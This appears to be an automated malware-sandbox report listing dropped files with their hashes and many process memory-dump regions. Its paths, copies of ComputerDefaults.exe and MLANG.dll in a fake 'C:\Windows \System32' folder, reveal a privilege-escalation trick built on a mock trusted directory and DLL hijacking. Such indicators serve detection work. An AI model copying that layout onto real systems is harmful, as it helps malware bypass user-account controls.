132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjwbezgi.w1w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd

Filesize
1.6MB

MD5
d7239bc304b1d9d4ae192e2570419d53

SHA1
dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

SHA256
7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

SHA512
d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

Download Submit
C:\Windows \System32\ComputerDefaults.exe

Filesize
66KB

MD5
cfa65b13918526579371c138108a7ddb

SHA1
28bc560c542c405e08001f95c4ea0511e5211035

SHA256
4c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6

SHA512
7ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88

Download Submit
C:\Windows \System32\MLANG.dll

Filesize
93KB

MD5
dc73eb0945a5e0246479de101537c9d8

SHA1
b4a9d97c2c6a43944a92bc6356e9be2582918da7

SHA256
a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73

SHA512
0bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29

Download Submit
memory/1460-21-0x0000000007A30000-0x0000000007AA6000-memory.dmp

Filesize
472KB

Download
memory/1460-42-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download
memory/1460-22-0x0000000008330000-0x00000000089AA000-memory.dmp

Filesize
6.5MB

Download
memory/1460-23-0x0000000007CD0000-0x0000000007CEA000-memory.dmp

Filesize
104KB

Download
memory/1460-1-0x00000000053B0000-0x00000000053E6000-memory.dmp

Filesize
216KB

Download
memory/1460-2-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download
memory/1460-3-0x0000000005A20000-0x0000000006048000-memory.dmp

Filesize
6.2MB

Download
memory/1460-4-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download
memory/1460-39-0x0000000002F00000-0x0000000002F0C000-memory.dmp

Filesize
48KB

Download
memory/1460-40-0x0000000007E40000-0x0000000007EA6000-memory.dmp

Filesize
408KB

Download
memory/1460-41-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

Filesize
4KB

Download
memory/1460-5-0x0000000005950000-0x0000000005972000-memory.dmp

Filesize
136KB

Download
memory/1460-20-0x0000000006E90000-0x0000000006ED4000-memory.dmp

Filesize
272KB

Download
memory/1460-53-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download
memory/1460-19-0x0000000006960000-0x00000000069AC000-memory.dmp

Filesize
304KB

Download
memory/1460-18-0x0000000006910000-0x000000000692E000-memory.dmp

Filesize
120KB

Download
memory/1460-13-0x0000000006130000-0x0000000006484000-memory.dmp

Filesize
3.3MB

Download
memory/1460-7-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/1460-6-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/1460-0-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

Filesize
4KB

Download
memory/1460-117-0x0000000009AB0000-0x0000000009B6C000-memory.dmp

Filesize
752KB

Download
memory/1460-116-0x0000000008240000-0x000000000829C000-memory.dmp

Filesize
368KB

Download
memory/1492-89-0x00000000024E0000-0x00000000024EC000-memory.dmp

Filesize
48KB

Download
memory/1492-114-0x000000000E8F0000-0x000000000E92C000-memory.dmp

Filesize
240KB

Download
memory/1492-94-0x0000000009C50000-0x0000000009C5A000-memory.dmp

Filesize
40KB

Download
memory/1492-92-0x000000000D220000-0x000000000D7C4000-memory.dmp

Filesize
5.6MB

Download
memory/1492-106-0x000000000A070000-0x000000000A122000-memory.dmp

Filesize
712KB

Download
memory/1492-105-0x0000000009F60000-0x0000000009FB0000-memory.dmp

Filesize
320KB

Download
memory/1492-107-0x000000000D9A0000-0x000000000DB62000-memory.dmp

Filesize
1.8MB

Download
memory/1492-108-0x000000000E190000-0x000000000E7A8000-memory.dmp

Filesize
6.1MB

Download
memory/1492-113-0x000000000E890000-0x000000000E8A2000-memory.dmp

Filesize
72KB

Download
memory/1492-93-0x0000000009C80000-0x0000000009D12000-memory.dmp

Filesize
584KB

Download
memory/1492-91-0x00000000071E0000-0x0000000007504000-memory.dmp

Filesize
3.1MB

Download
memory/1492-90-0x00000000070B0000-0x00000000071E2000-memory.dmp

Filesize
1.2MB

Download
memory/2756-135-0x0000000007680000-0x0000000007716000-memory.dmp

Filesize
600KB

Download
memory/2756-136-0x0000000006910000-0x0000000006932000-memory.dmp

Filesize
136KB

Download
memory/3132-38-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download
memory/3132-26-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download
memory/3132-25-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download
memory/3132-24-0x0000000074B80000-0x0000000075330000-memory.dmp

Filesize
7.7MB

Download